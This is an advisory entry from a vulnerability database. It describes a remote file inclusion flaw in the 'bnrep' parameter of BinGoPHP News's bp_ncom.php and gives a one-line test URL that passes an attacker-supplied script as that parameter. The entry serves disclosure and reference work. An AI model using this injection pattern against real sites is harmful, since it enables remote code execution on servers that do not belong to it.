BinGoPHP News bp_ncom.php bnrep Variable Remote File Inclusion

2006-09-07T13:52:33
ID OSVDB:31967
Type osvdb
Reporter OSVDB
Modified 2006-09-07T13:52:33

Description

Manual Testing Notes

http://[target]/[path]/bp_ncom.php?bnrep=[Evil_Script]

References:

Vendor URL: http://www.comscripts.com/jump.php?action=script&id=1382 Related OSVDB ID: 31968 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0090.html